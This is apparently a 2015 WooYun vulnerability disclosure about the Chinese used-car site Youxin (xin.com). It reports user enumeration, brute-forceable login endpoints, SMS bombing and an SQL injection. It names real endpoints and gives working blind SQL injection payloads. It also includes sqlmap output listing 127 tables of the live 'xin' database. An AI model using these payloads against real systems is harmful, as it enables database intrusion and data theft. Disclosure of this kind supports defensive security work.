漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0137058
漏洞标题:优信二手车多个安全漏洞礼包(sql注入/接口问题)
相关厂商:优信二手车
漏洞作者: 左手
提交时间:2015-08-26 13:15
修复时间:2015-10-10 13:16
公开时间:2015-10-10 13:16
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
1.登录注册可以判断用户手机号是否注册,收集信息
2.登录处和登陆后两处可进行爆破
3.m.xin.com存在短信轰炸
4.SQL注入一枚
漏洞证明:
1.登录注册可以判断用户手机号是否注册,收集信息
2.登录处和登陆后两处可进行爆破
POST /login/check/
POST /getpasswd/check_pass/
3.m.xin.com存在短信轰炸
4.sql注入一枚
POST http://m.xin.com/evaluate_car/get_st_info/
type=s&id=159&is_pcar=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=s&id=159' AND 2791=2791 AND 'FbWZ'='FbWZ&is_pcar=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: type=b&id=89' AND (SELECT * FROM (SELECT(SLEEP(5)))ywIr) AND 'atra'='atra&is_pcar=1
---
Database: xin
[127 tables]
+-----------------------------+
| column |
| user |
| activity |
| activity_car |
| ad_banner |
| app_discover |
| article |
| article_corre |
| article_recom |
| bank |
| bank_log |
| bookstudio |
| buycar_shrewd |
| call_data |
| call_data_zdh |
| call_tel_set |
| car |
| car_20150811 |
| car_detail |
| car_half_apply |
| car_half_apply_201508210400 |
| car_half_apply_data |
| car_half_audit |
| car_half_audit_log |
| car_half_detail |
| car_half_remark |
| car_off |
| car_pic |
| car_pic_tag |
| car_tag_operate_log |
| card_bin |
| case_analyze |
| check_list |
| check_result |
| city |
| city_all |
| city_area |
| city_che168 |
| city_province |
| collect_car |
| collect_dealer |
| collect_dealer_transfer |
| collect_device |
| collect_log |
| collect_partner |
| collect_pic |
| collect_remark |
| collect_revist |
| comment |
| con_bloc |
| con_market |
| con_qa |
| contract_confirm |
| credit_auth |
| cx_brand |
| cx_make |
| cx_mode |
| cx_mode_config |
| cx_mode_config_custom |
| cx_mode_config_dict |
| cx_mode_desc |
| cx_mode_map_iautos |
| cx_mode_map_iautos_ |
| cx_mode_map_new |
| cx_series |
| cx_series_custom |
| dealer |
| dealer_msg |
| dealer_score |
| dealer_sms_message |
| dealer_user |
| delay_fee |
| feedback |
| finance_income |
| finance_sub |
| half_saler |
| half_saler_car |
| help |
| hot |
| invite_code |
| notice |
| outstock_queue |
| person_credit |
| pos_addself |
| pos_data |
| rbac_action |
| rbac_actionrole |
| rbac_log |
| rbac_master |
| rbac_master_login |
| rbac_masterrole |
| rbac_resrole |
| rbac_role |
| report |
| ry_msg |
| ry_token |
| score_list |
| self_apply_dealer |
| seller_remark |
| shed_order |
| sms_message |
| sphinx_incr_car |
| statistics_search_day |
| statistics_search_total |
| stats_app |
| stats_day |
| stats_performance_record |
| stats_telephone |
| stats_total |
| stats_video_play |
| sub_cars |
| suggest |
| suggest_mem |
| suggest_mem_bak |
| suggest_mem_count |
| suggest_mem_count_bak |
| task_count |
| tool |
| user_comparison |
| user_dealer_fav |
| user_device |
| user_favorite |
| user_subscribe |
| wfj_mernum |
| work_shed |
| xin_order |
| yxp_cxk |
+-----------------------------+
修复方案:
接口多限制,参数过滤
版权声明:转载请注明来源 左手@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)